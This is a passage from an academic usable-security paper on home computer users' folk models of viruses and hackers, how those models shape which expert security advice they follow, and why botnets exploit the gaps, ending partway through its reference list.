All of the respondents had heard of computer viruses and possessed some mental model of their effects and transmission. The respondents focused their discussion primarily on the effects of viruses and the possible methods of transmission. In the second round of interviews, I prompted respondents to discuss how and why viruses are created by asking them to react to a number of hypothetical scenarios. These scenarios help me understand how the respondents apply these models to make security-relevant decisions. All of the respondents used the term ‘virus’ as a catch-all term for malicious software. Everyone seemed to recognize that viruses are computer programs. Almost all of the respondents classify many different types of malicious software under this term: computer viruses, worms, tro jans, adware, spyware, and keyloggers were all mentioned as ‘viruses.’ The respondents don’t make the distinctions that most experts do; they just call any malicious computer program a ‘virus.’ Thanks to the term ‘virus,’ all of the respondents used some sort of medical terminology to describe the actions of malware. Getting malware on your computer means you have ‘caught’ the virus, and your computer is ‘infected.’ Everyone who had a Mac seemed to believe that Macs are ‘immune’ to virus and hacking problems (but were worried anyway).

Overall, I found four distinct folk models of ‘viruses.’ These models differed in a number of ways. One of the major differences is how well-specified and detailed the model was, and therefore how useful the model was for making security-related decisions. One model was very under-specified, labeling viruses as simply ‘bad.’ Respondents with this model had trouble using it to make any kind of security-related decisions because the model didn’t contain enough information to provide guidance. Two other models (the Mischief and Crime models) were fairly well-described, including how viruses are created and why, and what the ma jor effects of viruses are. Respondents with these models could use them to extrapolate many different situations and use them to make many security-related decisions on their computer. Table 1 summarizes the major differences between the four models.

{6} All respondents have been given pseudonyms for anonymity.

2.1.1 Viruses are Generically ‘Bad’
A few subjects had a very under-developed model of viruses. These subjects knew that viruses cause problems, but these sub jects couldn’t really describe the problems that viruses cause. They just knew that they were generically ‘bad’ to get and should be avoided. Respondents with this model knew of a number of different ways that viruses are transmitted. These transmission methods seemed to be things that the subjects had heard about somewhere, but the respondents did not attempt to understand these or organize them into a more coherent mental model. Zoe believed that viruses can come from strange emails, or from “searching random things” on the Internet. She says she had heard that blocking popups helps with viruses too, and seemed to believe that without questioning. Peggy had heard that viruses can come from “blinky ads like you’ve won a million bucks.” Respondents with this model are uniformly unconcerned with getting viruses: “I guess just my lack of really doing much on the Internet makes me feel like I’m safer.” (Zoe). A couple of people with this model use Macintosh computers, which they believe to be “immune” to computer viruses. Since they are immune, it seems that they have not bothered to form a more complete model of viruses. Since these users are not concerned with viruses, they do not take any precautions against being infected. These users believe that their current behavior doesn’t really make them vulnerable, so they don’t need to go to any extra effort. Only one respondent with this model uses an anti-virus program, but that is because it came installed on the computer. These respondents seem to recognize that anti-virus software might help, but are not concerned enough to purchase or install it.

2.1.2 Viruses are Buggy Software
One group of respondents saw computer viruses as an exceptionally bug-ridden form of regular computer software. In many ways, these respondents believe that viruses behave much like most of the other software that home users experience. But to be a virus, it has to be ‘bad’ in some additional way. Primarily, viruses are ‘bad’ in that they are poorly written software. They lead to a multitude of bugs and other errors in the computer. They bring out bugs in other pieces of software. They tend to have more bugs, and worse bugs, than most other pieces of software. But all of the effects they cause are the same types of effects you get from buggy software: viruses can cause computers to crash, or to “boot me out” (Erica) of applications that are running; viruses can accidentally delete or “wipe out” information (Christine and Erica); they can erase important system files. In general, the computer just “doesn’t function properly” (Erica) when it has a virus. Just like normal software, viruses must be intentionally placed on the computer and executed. Viruses do not just appear on a computer. Rather than ‘catching’ a virus, computers are actively infected, though often this infection is accidental. Some viruses come in the form of email attachments. But they are not a threat unless you actually “click” on the attachment to run it. If you are careful about what you click on, then you won’t get the virus. Another example is that viruses can be downloaded from websites, much like many other applications. Erica believes that sometimes downloading games can end up causing you to download a virus. But still, intentional downloading and execution is necessary to be infected with a virus, much the same way that intentional downloading and execution is necessary to run programs from the Internet. Respondents with this model did not feel that they needed to exert a lot of effort to protect themselves from viruses. Mostly, these users tried to not download and execute programs that they didn’t trust. Sarah intentionally “limits herself ” by not downloading any programs from the Internet so she doesn’t get a virus. Since viruses must be actively executed, anti-virus program are not important. As long as no one downloads and runs programs from the Internet, no virus can get onto the computer. Therefore, anti-virus programs that detect and fix viruses aren’t needed. However, two respondents with this model run anti-virus software just in case a virus is accidentally put on the computer. Overall, this is a somewhat underdeveloped mental model of viruses. Respondents who possessed this model had never really thought about how viruses are created, or why. When asked, they talk about how they haven’t thought about it, and then make guesses about how ‘bad people’ might be the ones who create them. These respondents haven’t put too much thought into their mental model of viruses; all of the effects they discuss are either effects they have seen or more extreme versions of bugs they have seen in other software. Christine says “I guess I would know [if I had a virus], wouldn’t I?” presuming that any effects the virus has would be evident in the behavior of the computer. No connection is made between hackers and viruses; they are distinct and separate entities in the respondent’s mind.

2.1.3 Viruses Cause Mischief
A good number of respondents believed that viruses are pieces of software that are intentionally annoying. Someone created the virus for the purpose of annoying computer users and causing mischief. Viruses sometimes have effects that are often much like extreme versions of annoying bugs: crashing your computer, deleting important files so your computer won’t boot, etc. Often the effects of viruses are intentionally annoying such as displaying a skull and crossbones upon boot (Bob), displaying advertising popups (Floyd), or downloading lots of pornography (Dana). While these respondents believe that viruses are created to be annoying, they rarely have a well-developed idea of who created them. They don’t naturally mention a creator for the viruses, just a reason why they are created. When pushed, these respondents will talk about how they are probably created by “hackers” who fit the Graffiti hacker model below. But the identity of the creator doesn’t play much of a role in making security decisions with this model. Respondents with this model always believe that viruses can be “caught” by actively clicking on them and executing them. However, most respondents with this model also believe that viruses can be “caught” by simply visiting the wrong webpages. Infection here is very passive and can come from just from visiting the webpage. These webpages are often considered to be part of the ‘bad’ part of the Internet. Much like graffiti appears in the ‘bad’ parts of cities, mischievous viruses are most prevalent on the bad parts of the Internet. While most everyone believes that care in clicking on attachments or downloads is important, these respondents also try to be careful about where they go on the Internet. One respondent (Floyd) tries to explain why: cookies are automatically put on your computer by websites, and therefore, viruses being automatically put on your computer could be related to this. These ‘bad’ parts of the Internet where you can easily contract viruses are frequently described as morally ambiguous webpages. Pornography is always considered shady, but some respondents also included entertainment websites where you can play games, and websites that have been on the news like “MySpaceBook” (Gina). Some respondents believed that a “secured” website would not lead to a virus, but Gail acknowledged that at some sites “maybe the protection wasn’t working at those sites and they went bad.” (Note the passive tense; again, she has not thought about how site go bad or who causes them to go bad. She is just concerned with the outcome.)

2.1.4 Viruses Support Crime
Finally, some respondents believe that viruses are created to support criminal activities. Almost uniformly, these respondents believe that identity theft is the end goal of the criminals who create these viruses, and the viruses assist them by stealing personal and financial information from individual computers. For example, respondents with this model worry that viruses are looking for credit card numbers, bank account information, or other financial information stored on their computer. Since the main purpose of these viruses is to collect information, the respondents who have this model believe that viruses often remain undetected on computers. These viruses do not explicitly cause harm to the computer, and they do not cause bugs, crashes, or other problems. All they do is send information to criminals. Therefore, it is important to run an anti-virus program on a regular basis because it is possible to have a virus on your computer without knowing it. Since viruses don’t harm your computer, backups are not necessary. People with this model believed that there are many different ways for these viruses to spread. Some viruses spread through downloads and attachments. Other viruses can spread “automatically,” without requiring any actions by the user of the computer. Also, some people believe that hackers will install this type of virus onto the computer when they break in. Given this wide variety of transmission methods and the serious nature of identity theft, respondents with this model took many steps to try to stop these viruses. These users would work to keep their anti-virus up to date, purchasing new versions on a regular basis. Often, they would notice when the anti-virus would conduct a scan of their computer and check the results. Valerie would even turn her computer off when it is not in use to avoid potential problems with viruses.

2.1.5 Multiple Types of Viruses
A couple of respondents discussed multiple types of viruses on the Internet. These respondents believed that some viruses are mischievous and cause annoying problems, while other viruses support crime and are difficult to detect. All users that talked about more than one type of virus talked about both of the previous two virus folk models: the mischievous viruses and the criminal viruses. One respondent, Jack, also talked about a third type of virus that was created by anti-virus companies, but he seemed like he felt this was a conspiracy theory, and consequently didn’t take that suggestion very seriously. For the respondents with multiple models, they generally would take all of the precautions that either model would predict. For example, they would make regular backups in case they caught a mischievous virus that damaged their computer, but they also would regularly run their anti-virus program to detect the criminal viruses that don’t have noticeable effects. This fact suggests that information sharing between users may be beneficial; when users believe in multiple types of viruses, they take appropriate steps to protect against all types.

2.2 Models of Hackers and Break-ins
The second ma jor category of folk models describe the attackers, or the people who cause Internet security problems. These attackers are always given the name “hackers,” and all of the respondents seemed to have some concept of who these people were and what they did. The term “hacker” was applied to describe anyone who does bad things on the Internet, no matter who they are or how they work. All of the respondents describe the main threat that hackers pose as “breaking in” to their computer. They would disagree as to why a hacker would want to “break in” to a computer, and to which computers they would target for their break ins, but everyone agreed on the terminology for this basic action. To the respondents, breaking in to a computer meant that the hacker could then use the computer as if they were sitting in front of it, and could cause a number of different things to happen to the computer. Many respondents stated that they did not understand how this worked, but they still believed it was possible. My respondents described four distinct folk models of hackers. These models differed mainly in who they believed these hackers were, what they believed motivated these people, and how they chose which computers to break in to. Table 2 summarizes the four folk models of hackers.



2.2.1 Hackers are Digital Graffiti Artists
One group of respondents believe that hackers are technically skilled people causing mischief. There is a collection of individuals, usually called “hackers,” that use computers to cause a technological version of mischief. Often these users are envisioned as “college-age computer types” (Kenneth). They see hacking computers as sort of digital graffiti; hackers break in to computers and intentionally cause problems so they can show off to their friends. Victim computers are a canvas for their art. When respondents with this model talked about hackers, they usually focused on two features: strong technical skills and the lack of proper moral restraint. Strong technical skills provide the motivation; hackers do it ”for sheer sport” (Lorna) or to demonstrate technical prowess (Hayley). Some respondents envision a competition between hackers, where more sophisticated viruses or hacks “prove you’re a better hacker” (Kenneth); others see creating viruses and hacking as part of “learning about the Internet” (Jack). Lack of moral restraint is what makes them different than others with technical skills; hackers are sometimes described as people as maladjusted individuals who “want to hurt others for no reason.” (Dana) Respondents will describe hackers as ”miserable” people. They feel that hackers do what they do for no good reason, or at least no reason they can understand. Hackers are believed to be lone individuals; while they may have hacker friends, they are not part of any organization. Users with this model often focus on the identity of the hacker. This identity – a young computer geek with poor morals – is much more developed in their mind than the resulting behavior of the hacker. As such, people with this model can usually talk clearly and give examples of who hackers are, but seem less confident in information about the resulting break-ins that happen. These hackers like to break stuff on the computer to create havoc. They will intentionally upload viruses to computers to cause mayhem. Many sub jects believe that hackers intentionally cause computers harm; for example Dana believes that hackers will “fry your hard drive.” (Dana) Hackers might install software to let them control your computer; Jack talked about how a hacker would use his instant messenger to send strange messages to his friends. These mischievous hackers were seen as not targetting specific individuals, but rather choosing random strangers to target. This is much like graffiti; the hackers need a canvas and choose whatever computer they happen to come upon. Because of this, the respondents felt like they might become a victim of this type of hacking at any time. Often, victims like this felt like there wasn’t much they could to do protect themselves from this type of hacking. This was because respondents didn’t understand how hackers were able to break into computers, so they didn’t know what could be done to stop it. This would lead to a feeling of futility; “if they are going to get in, they’re going to get in.” (Hayley) This feeling of futility echoes similar statements discussed by Dourish et al. [12].

2.2.2 Hackers are Burglars Who Break Into Computers for Criminal Purposes
Another set of respondents believe that hackers are criminals that happen to use computers to commit their crimes. Other than the use of the computer, they share a lot in common with other professional criminals: they are motivated by financial gain, and they can do what they do because they lack common morals. They would “break into” computers to look for information much like a burglar will break into houses to look for valuables. The most salient part of this folk model is the behavior of the hacker; the respondents could talk in detail about what the hackers were looking for but spoke very little about the identity of the hacker. Almost exclusively, this criminal activity is some form of identity theft. For example, respondents believe that if a hacker obtains their credit card number, for example, then that hacker can make fraudulent charges with it. But the respondents weren’t always sure what kind of information the hacker was specifically looking for; they just described it as information the hacker could use to make money. Ivan talked about how hackers would look around the computer much like a thief might rummage around in an attic, looking for something useful. Erica used a different metaphor, saying that hackers would “take a digital photo of everything on my computer” and look in it for useful identity information. Usually, the respondents envision the hacker himself using this financial information (as opposed to selling the information to others). Since hackers target information, the respondents believe that computers are not harmed by the break-ins. Hackers look for information, but do not harm the computer. They simply rummage around, “take a digital photo,” possibly install monitoring software, and leave. The computer continues to work as it did before. The main concern of the respondents is how the hacker might use the information that they steal. These hackers choose victims opportunistically; much like a mugger chooses his victims, these hackers will break into any computers they run across to look for valuable information. Or, more accurately, the respondents don’t have a good model of how hackers choose, and believe that there is a decent chance that they will be a victim someday. Gail talks about how hackers are opportunistic, saying “next time I go to their site they’ll nab me.” Hayley believes that they just choose computers to attack without knowing much about who owns them. Respondents with this belief are willing to take steps to protect themselves from hackers to avoid becoming a victim. Gail tries to avoid going websites she’s not familiar with to prevent hackers from discovering her. Jack is careful to always sign out of accounts and websites when he is finished. Hayley shuts off her computer when she isn’t using it so hackers cannot break into it.

2.2.3 Hackers are Criminals who Target Big Fish
Another group of respondents had a conceptually similar model. This group also believes that hackers are Internet criminals who are looking for information to conduct identity theft. However, this group has thought more about how these hackers can best accomplish this goal, and have come to some different conclusions. These respondents believe in “massive hacker groups” (Hayley) and other forms of organization and coordination among criminal hackers. Most tellingly, this group believes that hackers only target the “big fish.” Hackers primarily break into computers of important and rich people in order to maximize their gains. Every respondent who holds this model believes that he or she is not likely to be a victim because he or she is not a big enough fish. They believe that hackers are unlikely to ever target them, and therefore they were safe from hacking. Irving believe that “I’m small potatoes and no one is going to bother me.” They often talk about how other people are more likely targets: “Maybe if I had a lot of money” (Floyd) or “like if I were a bank executive” (Erica). For these respondents, protecting against hackers isn’t a high priority. Mostly they find reasons to trust existing security precautions rather than taking extra steps to protect themselves. For example, Irving talked about how he trusts his pre-installed firewall program to protect him. Both Irving and Floyd trust their passwords to protect them. Basically, their actions indicate that they believe in the speed bump theory: by making it slightly hard for hackers using standard security technologies, hackers will decide it isn’t worthwhile to target them.

2.2.4 Hackers are Contractors Who Support Criminals
Finally, there is a sort of hybrid model of hackers. In this view, hackers the people are very similar to the mischievous graffiti-hackers from above: they are college-age, technically skilled individuals. However, their motivations are more intentional and criminal. These hackers are out to steal personal and financial information from people. Users with this model show evidence of more effort in thinking through their mental model and integrating the various sources of information they have. This model can be seen as a hybrid of the mischievous graffiti-hacker model and the criminal hacker model, integrated into a coherent form by combining the most salient part of the mischievous model (the identity of the hacker) and the most salient part of the criminal model (the criminal activities). Also, everyone who had this model expressed a concern about how hacking works. Kenneth stated that he doesn’t understand how someone can break into a computer without sitting in front of it. Lorna wondered how you can start a program running; she feels you have to be in front of the computer to do that. This indicates that these respondents are actively trying to integrate the information they have about hackers into a coherent model of hacker behavior. Since these hackers are first and foremost young technical people, the respondents believe that these hackers are not likely to be identity thieves. They believe that the hackers are more likely to sell this identity information for others to use. Since the hackers just want to sell information, the respondents reason, they are more likely to target large databases of identity information such as banks or retailers like Amazon.com. Respondents with this model believed that hackers weren’t really their problem. Since these hackers tended to target larger institutions like banks or e-commerce websites, their own personal computers weren’t in danger. Therefore, no effort was needed to secure their personal computers. However, all respondents with this model expressed a strong concern for who they do business with online. These respondents would only make purchases or provide personal information to institutions they trusted to get the security right and figure out how to be protected against hackers. These users were highly sensitive to third parties possessing their data.

2.2.5 Multiple Types of Hackers
Some respondents believed that there were multiple types of hackers. Most of the time, these respondents would believe that some hackers are the mischievous graffiti-hackers and that other hackers are criminal hackers (using either the burglar or big fish model, but not both). These respondents would then try to make the effort to protect themselves from both types of hacker threats as necessary. It seems that there is some amount of cognitive dissonance that occurs when respondents hear about both mischievous hackers and criminal hackers. There are two ways that respondents resolve this: the simplest way to resolve this is to believe that some hackers are mischievous and other hackers are criminals, and consequently keep the models separate; a more complicated way is to try to integrate the two models into one coherent belief about hackers. This latter option involves a lot of effort making sense of the new folk model that is not as clear or as commonly shared as the mischievous and criminal models. The ‘contractor’ model of hackers is the result of this integration of the two types of hackers.

3. FOLLOWING SECURITY ADVICE
Computer security experts have been providing security advice to home computer users for many years now. There are many websites devoted to doling out security advice, and numerous technical support forums where home computer users can ask security-related questions. There has been much effort to simplify security advice so regular computer users can easily understand and follow this advice. However, many home computer users still do not follow this advice. This is evident from the large number of security problems that plague home computers. There is a disagreement among security experts as to why this advice isn’t followed. Some experts seem to believe that home users do not understand the security advice, and therefore more education is needed. Others seem to believe that home users are simply incapable of consistently making good security decisions [10]. However, none of these explanations explain which advice does get followed and which advice does not. The folk models described above begin to provide an explanation of which expert advice home computer users choose to follow, and which advice to ignore. By better understanding why people choose to ignore certain pieces of advice, we can better craft that advice and technologies to have a greater effect. In Table 3, I list 12 common pieces of security advice for home computer users. This advice was collected from the Microsoft Security at Home website {7}, the CERT Home Computer Security website {8}, and the US-CERT Cyber-Security Tips website {9}, and much of this advice is duplicated across websites. This advice represents the distilled wisdom on many computer security experts. This table then summarizes, for each folk model, whether that advice is important to follow, helpful but not essential, or not necessary to follow. To me, the most interesting entries indicate when users believe that a piece of security advice is not necessary to follow (labeled ‘xx’ in the table). These entries show how home computer users apply their folk models to determine for themselves whether a given piece of advice is important. Also interesting are the entries labeled ‘??’; these entries indicate places where users believe that the advice will help with security, but do not see the advice as so important that it must always be followed. Often users will decide that following advice labeled with ‘??’ is too costly in terms of effort or money, and decide to ignore it. Advice labeled ‘!!’ is extremely important, and the respondents feel that it should never be ignored, even if following it is inconvenient, costly, or difficult.

{7} http://www.microsoft.com/protect/default.mspx, retrieved July 5, 2009
{8} http://www.cert.org/homeusers/HomeComputerSecurity/, retrieved July 5, 2009
{9} http://www.us- cert.gov/cas/tips/, retrieved July 5, 2009

3.1 Anti-Virus Use
Advice 1–3 has to do with anti-virus technology: Advice #1 states that anti-virus software should be used; #2 states that the virus signatures need to be constantly updated to be able to detect current viruses; and #3 states that the anti-virus software should regularly scan a computer to detect viruses. All of these are best practices for using anti-virus software. Respondents mostly use their folk models of viruses to make decisions about anti-virus use, for obvious reasons. Respondents who believe that viruses are just buggy software also believe it is not necessary to run anti-virus. They think they can keep viruses off of their computer by controlling what gets installed on their computer; they believe viruses need to be executed manually to infect a computer, and if they never execute one then they don’t need anti-virus. Respondents with the under-developed folk model of viruses, who refer to viruses as generically ‘bad,’ also do not use anti- virus software. These people understand that viruses are harmful and that anti-virus software can stop them. However, they have never really thought about specific harms a virus might cause to them. Lacking an understanding of the threats and potential harm, they generally find it unnecessary to exert the effort to follow the best practices around anti-virus software. Finally, one group of respondents believe that anti-virus software can help stop hackers. Users with the burglar model of hackers believe that regular anti-virus scans can be important because these burglar-hackers will sometimes install viruses to collect personal information. Regular anti-virus use can help detect these hackers.

3.2 Other Security Software
Advice #4 concerns other types of security software; home computer users should run a firewall or more comprehensive Internet security suite. I think that most of the respondents didn’t understand what this security software did, other than a general notion of providing “security.” As such, no one included security software as an important component of their mental model. Respondents who held the graffiti-hacker or burglar-hacker models believed that this software must help with hackers somehow, even though they don’t know how, and would suggest installing it. But since they do not understand how it works, they do not consider it of vital importance. This highlights an opportunity for home user education; if these respondents better understood how security software helps protect against hackers, they might be more interested in using it and maintaining it. One interesting belief about this software comes from the respondents who believe hackers only go after big fish. For these respondents, security software can serve as a speed-bump that discourages hackers from casually breaking into their computer. For these people, they don’t care exactly how it works as long as it does something.

3.3 Email Security
Advice #5 is the only piece of advice about email on my list. It states that you shouldn’t open attachments from people you don’t recognize. Everyone in my sample was familiar with this advice and had taken it to heart. Everyone believed that viruses can be transmitted through email attachments, and therefore not clicking on unknown attachments can help prevent viruses.

3.4 Web Browsing
Advice 6-9 all deal with security behaviors while browsing the web. Advice #6 states that users need to ensure that they only download and run programs from trustworthy sources. Many types of malware are spread through downloads. #7 states that users should only browse web-pages from trustworthy sources. There are many types of malicious websites such as phishing websites, and some websites can spread malware simply by visiting the site and executing the javascript on the website. #8 states that users should disable scripting like Java and JavaScript in their web browsers. Often there are vulnerabilities in these scripts, and some malware uses these vulnerabilities to spread. And #9 suggests using good passwords so attackers cannot guess their way into your accounts. Overall, many respondents would agree with most of this advice. However, no one seemed to understand the advice about web scripts; indeed, no one seemed to even understand what a web script was. Advice #8 was largely ignored because it wasn’t understood. Everyone understood the need for care in choosing what to download. Downloads were strongly associated with viruses in most respondents’ minds. However, only users with well- developed models of viruses (the Mischief and Support Crime models) believed that viruses can be “caught” simply by browsing web pages. People who believed that viruses were buggy software didn’t see browsing as dangerous because they weren’t actively clicking on anything to run it. While all of the respondents expressed some knowledge of the importance of passwords, few exerted extra effort to make good passwords. Everyone understood that, in general, passwords are important, but they couldn’t explain why. Respondents with the graffiti hacker model would sometimes put extra effort into their passwords so that mischievous hackers couldn’t mess up their accounts. And respondents who believed that hackers only target big fish thought that passwords could be an effective speed bump to prevent hackers from casually targeting them. Respondents who believed in hackers as contractors to criminals uniformly believed that they were not targets of hackers and were therefore safe. However, they were careful in choosing which websites to do business with. Since these hackers targeted web businesses with lots of personal or financial information, it is important to only do business with websites that are trusted to be secure.

3.5 Computer Maintenance
Finally, Advice 10-12 concerns computer maintenance. Advice #10 suggests that users make regular backups in case some of their data is lost or corrupted. This is good advice for both security and non-security reasons. #11 states that it is important to keep the system patched with the latest updates to protect against known vulnerabilities that hackers and viruses can exploit. And #12 echoes the old maxim that the most secure machine is one that is turned off. Different models had dramatically different suggestions as to which types of maintenance are important. For example, mischievous viruses and graffiti hackers can cause data loss, so users with those models feel that backups are very important. But users who believe in more criminal viruses and hackers don’t feel that backups are necessary; hackers and viruses steal information but don’t delete it. Patching is an important piece of advice, since hackers and viruses need vulnerabilities to exploit. Most respondents only experience patches through the automatic updates feature in their operating system or applications. Respondents mostly associated the patching advice with hackers; respondents who felt that they would be a target of hackers also felt that patching was an import tool to stop hackers. Respondents who believed that viruses are buggy software feel that viruses also bring out more bugs in other software on the computer; patching the other software makes it more difficult for viruses to cause problems.

4. BOTNETS and the FOLK MODELS
This study was inspired by the recent rise of botnets as a strategy for malicious attackers. Understanding the folk models that home computer users employ in making security decisions sheds light on why botnets are so successful. Modern botnet software seems designed to take advantage of gaps and security weaknesses in multiple folk models. I begin by listed a number of stylized facts about botnets. These facts are not true about all botnets and botnet software, but these facts are true about many of the recent and large botnets.

1. Botnets attack third parties. When botnet viruses compromise a machine, that machine only serves as a worker. That machine is not the end goal of the attacker. The owner of the botnet intends to use that machine (and many others) to cause problems for third parties.
2. Botnets only want the Internet connection The only thing the botnet wants on the victim computer is the Internet connection. Botnet software rarely takes up much space on the hard drive, rarely looks at existing data on the hard drive, rarely occupies much memory, and usually don’t use much CPU. Nothing that makes the computer unique is important.
3. Botnets don’t directly harm the host computer. Most botnet software, once installed, does not directly cause harm to the machine it is running on. It consumes resources, but often botnet software is configured to only use the resources at times they are otherwise unused (like running in the middle of the night). Some botnets even install patches and software updates so that other botnets cannot also use the computer.
4. Botnets spread automatically through vulnerabilities. Botnets often spread through automated compromises. They automatically scan the internet, compromise any vulnerable computers, and install copies of the botnet software on the compromised computers. No human intervention is required; neither the attacker nor the zombie owner nor the vulnerable computer owner need to be sitting at their computer at the time.
These stylized facts about botnets are not true for all botnets, but hold for many of the current, large, well-known, and well-studies botnets. I believe that botnet software effectively takes advantage of the limited and incomplete nature of the folk models of home computer users. Table 4 illustrates how each model does or does not incorporate the possibility of each of the stylized facts about botnets.

Botnets attack third parties.
None of the hacker models would predict that compromises would be used to attack third parties. Respondents who held both the Big Fish mental model and the Contractor mental model believe that, since hackers don’t want anything on the computer, they would target other computers and leave the unwanted computer alone. Respondents with the Burglar model believe that they might be a target, but only because the hacker wants something that might be on their computer. They would believe that once the hacker either finds what they were looking for, or cannot find anything interesting, then the hacker would leave. Respondents with the Graffiti model believe that hacking and vandalizing the computer is the end goal; it would never cross their mind to then use that computer to attack third parties. None of the respondents used their virus models to discuss potential third parties either. A couple of respondents with the Viruses are Bad model mentioned that once they got a virus, it might try to “spread.” However, they had no idea how this spreading might happen. Spreading is a form of harm to third parties; however, it is not the coordinated and intentional harm that botnets cause. Respondents who employed the other three virus models never mentioned the possibility of spreading beyond their computers. They were mostly focused on what the virus would do to them, and not to how it might affect others. Also, since they had an idea of how viruses spread, those ideas only involved spreading through webpages and email. They don’t run a webpage on their computer, and no one acknowledged that a virus could use their email to send copies out.

Botnets only want the Internet connection.
No one in this study could conceive of a hacker or virus that only wanted the Internet connection of their computer. The three crime-based hacker models (Burglar, Big Fish, and Contractor ) all believe that hackers are actively looking for something stored on the computer. All the respondents with these three models believed that their computer had (or might have) some specific and unique information that hackers wanted. Respondents with the Graffiti model believed that computers are a sort of canvas for digital mischief. I would guess that they might believe that botnet owners would only want the Internet connection; they believe there is nothing unique about their computer that makes hackers want to do digitial graffiti on their computer. None of the virus models would have anything to say about this fact. Respondents with the Viruses are Bad model and the Buggy Software models didn’t attribute any intentionality to viruses. Respondents with the Mischief and Support Crime models believed viruses were created for a reason, but didn’t seem to think about how using the computer to spread.

Botnets don’t harm the host computer.
This is the one stylized fact on this list that any respondents explicitly mentioned. Respondents with the Supports Crime model believe that viruses might try to hide on the computer and not display any outward signs of their presence. Respondents who employ one of the other three virus models would find this strange; to them, viruses always create visible effects. To users with the Mischief model, these visible effects are the main point of the virus! Additionally, the three folk models of hackers that relate to crime all include the idea that a ‘break in’ by hackers might not harm the computer. To these respondents, since hackers are just looking for information, they don’t necessarily want to harm the computer. Respondents who use the Graffiti model would find compromises that don’t harm the computer to be strange, as the main purpose of ‘breaking into’ computers is to vandalize them.

Botnets spread automatically.
The idea that botnets spread without human intervention would be strange to most of the respondents. Almost all of the respondents believed that hackers had to be sitting in front of some computer somewhere when they were “breaking into” computers. Indeed, two of the respondents even asked the interviewer how it was possible to use a computer without being in front of it. Most respondents belived that viruses generally also required some form of human intervention in order to spread. Viruses could be ‘caught’ by visiting webpages, by down- loading software, or by clicking on emails. But all of those required someone to actively use the computer. Only one subject explicitly mentioned that viruses can “just happen” (Jack). Respondents with the Viruses are Bad model understood that viruses could spread, but didn’t know how. These respondents might not be surprised to learn that viruses can spread without human intervention, but probably haven’t thought about it enough for that fact to be salient.

Summary
Botnets are extremely cleverly designed. They take advantage of home computer users by operating in a very different manor from the one conceived of by the respondents in this study. The only stylized fact listed above that a decent number of my respondents would recognize as a property of attacks is that botnets don’t cause harm to the host computer. And not everyone in the study would believe this; some respondents had a mental model where not harming the computer wouldn’t make sense. This analysis illustrates why eliminating botnets is so difficult. Many home computer users probably have similar folk models to the ones possessed by the respondents in this study. If so, botnets look very different from the threats envisioned by many home computer users. Since home computer users do not see this as a potential threat, they do not take appropriate steps to protect themselves.

5. LIMITATIONS and MOVING FORWARD
Home computer users conceptualize security threats in multiple ways; consequently, users make different decisions based on their conceptualization. In my interviews, I found four distinct ways of thinking about malicious software as a security threat: the ‘viruses are bad,’ ‘buggy software,’ ‘viruses cause mischief,’ and ‘viruses support crime’ models. I also found four more distinct ways of thinking about malicious computer users as a threat: thinking of malicious others as ‘graffiti artists,’ ‘burglars,’ ‘internet criminals who target big fish,’ and ‘contractors to organized crime.’ I did not use a generalizable sampling method. I am able to describe a number of different folk models, but I cannot estimate how prevalent each model is in the population. Such estimates would be useful in understanding nationwide vulnerability, but I leave these estimates to future work. I also cannot say if my list of folk models is exhaustive — there may be more models than I describe — but it does represent the opinions of a variety of home computer users. Indeed, the snowball sampling method increases the chances that I will interview users with similar folk model despite the demographic heterogeneity of my sample. Previous literature [12, 15] was able to describe some basic security beliefs held by non-technical users; I provide structure to these theories by understanding how home computer users group these into semi-coherent mental models in their mind. My primary contribution with this study is an understanding of why users strictly follow some security advice from computer security experts and ignore other advice. This illustrates one major problem with security education efforts: they do not adequately explain the threats that home computer users face; rather they focus on practical, actionable advice. But without an understanding of threats, home computer users intentionally choose to ignore advice that they don’t believe will help them. Security education efforts should focus not only on recommending what actions to take, but also emphasize why those actions are necessary. Following the advice of Kempton [19], security experts should not evaluate these folk models on the basis of correctness, but rather on how well they meet the needs of the folk that possess them. Likewise, when designing new security technologies, we should not attempt to force users into a more ‘correct’ mental model; rather, we should design technologies that encourage users with limited folk models to be more secure. Effective security technologies need to protect the user from attacks, but also expose potential threats to the user in a way the user understands so that he or she is motivated to use the technology appropriately.

6. ACKNOWLEDGMENTS
I appreciate the many comments and help during the whole pro ject from Jeff MacKie-Mason, Judy Olson, Mark Ackerman, and Brian Noble. Tiffany Vienot was also extremely helpful in helping me explain my methodology clearly. This material is based upon work supported by the National Science Foundation under Grant No. CNS 0716196.

7. REFERENCES
[1] A. Adams and M. A. Sasse. Users are not the enemy. Communications of the ACM, 42(12):40–46, December 1999.
[2] R. Anderson. Why cryptosystems fail. In CCS ’93: Proceedings of the 1st ACM conference on Computer and communications security, pages 215–227. ACM Press, 1993.
[3] F. Asgharpour, D. Liu, and L. J. Camp. Mental models of computer security risks. In Workshop on the Economics of Information Security (WEIS), 2007.
[4] P. Bacher, T. Holz, M. Kotter, and G. Wicherski. Know your enemy: Tracking botnets. from the Honeynet Pro ject, March 2005.
[5] P. Barford and V. Yegneswaran. An inside look at botnets. In Special Workshop on Malware Detection, Advances in Information Security. Springer-Verlag, 2006.
[6] J. L. Camp. Mental models of privacy and security. Available at http://papers.ssrn.com/sol3/papers.cfm?abstract_id=922735, August 2006.
[7] L. J. Camp and C. Wolfram. Pricing security. In Proceedings of the Information Survivability Workshop, 2000.
[8] A. Collins and D. Gentner. How people construct mental models. In D. Holland and N. Quinn, editors, Cultural Models in Language and Thought. Cambridge University Press, 1987.
[9] R. Contu and M. Cheung. Market share: Security market, worldwide 2008. Gartner Report: http://www.gartner.com/it/page.jsp?id=1031712
, June 2009.
[10] L. F. Cranor. A framework for reasoning about the human in the loop. In Usability, Psychology, and Security Workshop. USENIX, 2008.
[11] R. D’Andrade. The Development of Cognitive Anthropology. Cambridge University Press, 2005.
[12] P. Dourish, R. Grinter, J. D. de la Flor, and M. Joseph. Security in the wild: User strategies for managing security as an everyday, practical problem. Personal and Ubiquitous Computing, 8(6):391–401, November 2004.
[13] D. M. Downs, I. Adema j, and A. M. Schuck. Internet security: Who is leaving the ’virtual door’ open and why? First Monday, 14(1-5), January 2009.
[14] R. E. Grinter, W. K. Edwards, M. W. Newman, and N. Ducheneaut. The work to make a home network work. In Proceedings of the 9th European Conference on Computer Supported Cooperative Work (ECSCW ’05), pages 469–488, September 2005.
[15] J. Gross and M. B. Rosson. Looking for trouble: Understanding end user security management. In Symposium on Computer Human Interaction for the Management of Information Technology (CHIMIT), 2007.
[16] C. Herley. So long, and no thanks for all the externalities: The rational rejection of security advice by users. In Proceedings of the New Security Paradigms Workshop (NSPW), September 2009.
